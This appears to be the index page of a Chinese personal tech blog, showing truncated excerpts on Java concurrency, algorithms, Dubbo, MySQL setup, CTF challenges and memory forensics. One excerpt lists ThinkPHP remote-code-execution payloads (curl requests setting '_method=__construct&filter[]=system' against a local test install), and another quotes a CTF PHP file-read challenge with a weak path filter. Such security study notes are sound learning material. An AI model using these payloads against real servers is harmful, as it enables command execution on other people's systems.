向各位大佬学习,坚持打卡,day_day_up。
2018/12/04:
当php.ini和程序设置的序列化引擎不同时,导致的反序列化问题
研究湖湘杯2018 regex_format,题目不难,就是逆向对我来说是个大问题,
《Linux性能优化实战》之平均负载,希望以后能用上
明日计划:
php内核调试环境搭建,调试one line php challenge,https://hackmd.io/s/Hk-2nUb3Q#%E6%BC%8F%E6%B4%9E%E9%80%82%E7%94%A8%E7%89%88%E6%9C%AC
https://github.com/wofeiwo...
AtomicInteger深入理解
高并发的情况下,i++无法保证原子性,往往会出现问题,所以引入AtomicInteger类。
代码测试123456789101112131415161718192021222324252627282930313233public class TestAtomicInteger { private static final int THREADS_COUNT = 2; public static int count = 0; public static volatile int countVolatile = 0; p...
一天刷10道,bat不是梦啊,加油T: 时间复杂度 S:空间复杂度n个数,大小0-(n-1),判断是否有重复条件: 无
方法一: 排序,扫描即可 O(nlogn)
方法二: 使用HashTable O(n)
方法三: 扫描下标为i的数字m时,判断m== i, 是,继续扫描,否,将m和下标为m的数字n进行比较,若相等,则重复,否则交换下标为m和下标为i的两个数字。
T: O(n)
S: O(1)
123456789101112131415161718192021222324252627282930bool duplicate(...
JAVA多线程:进程和线程:进程:每个进程都有独立的代码和数据空间(进程上下文),进程间的切换会有较大的开销,一个进程包含1–n个线程。(进程是资源分配的最小单位)
线程:同一类线程共享代码和数据空间,每个线程有独立的运行栈和程序计数器(PC),线程切换开销小。(线程是cpu调度的最小单位)
线程和进程一样分为五个阶段:创建、就绪、运行、阻塞、终止。
多进程是指操作系统能同时运行多个任务(程序)。
多线程是指在同一程序中有多个顺序流在执行。
在java中要想实现多线程,有两种手段,一种是继续**Thread类,另外一种是实现Runable接口.(其实准确来讲,应该有三种,还有一种是实现C...
记录dubbo源码阅读过程中,看到的有趣的问题,以后有时间,在慢慢梳理issuse#619代码: org/apache/dubbo/rpc/RpcResult.java
123456789101112131415161718192021222324Override public Object recreate() throws Throwable { if (exception != null) { // fix issue#619 try { // get Thr...
payload:
1234567891011121314需要开启debug版本:payload1:第一次执行system:curl -v -d "_method=__construct&filter[]=system" "http://localhost/think/public/index.php?a=dir"payload2:第二次执行system:curl -d "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]...
Junoir ctfWEBflags12345678<?php highlight_file(__FILE__); $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? 'ot'; $lang = explode(',', $lang)[0]; $lang = str_replace('../', '', $lang); $c = file_get_contents("flags/$lang"); if (!$c) ...
秒杀链接:https://github.com/fengyuhetao/miaosha.git
两次MD5(登录保护)
用户端
用户输入pass = md5(明文+固定salt)
服务端
pass = md5(用户输入pass+随机salt),随机salt存入数据库
个人感觉: 感觉没啥用,第一次md5用于防止密码直接在公网上传输,只需要将抓取到的md5之后的值作为伪密码,不在经过js处理,依然可以正常登录。
JSR参数验证(自定义注解)定义接口interface IsMobile12345678910111213141516171819202122232425pa...
Navicat无法连接mysql8.0mysql8.0加密方式与mysql5几加密方式不同,需要先更改加密方式。
ALTER USER ‘root‘@’localhost’ IDENTIFIED BY ‘’ PASSWORD EXPIRE NEVER;
ALTER USER ‘root‘@’localhost’ IDENTIFIED WITH mysql_native_password BY ‘’;
ubuntu虚拟机扩容
关闭虚拟机然后扩展磁盘
打开虚拟机,安装GParted. apt install GParted
打开GParted
删除swap分区
删除ex...
Otter-CTF 内存取证分析下载地址:https://mega.nz/#!sh8wmCIL!b4tpech4wzc3QQ6YgQ2uZnOmctRZ2duQxDqxbkWYipQ
mega这个平台看起来也不错。
prepare
查看内存镜像的信息
12345678910111213141516ht@TIANJI:/mnt/c/Users/HT/Desktop/OtterCTF$ volatility -f OtterCTF.vmem imageinfoVolatility Foundation Volatility Framework 2.5INFO : volatility...
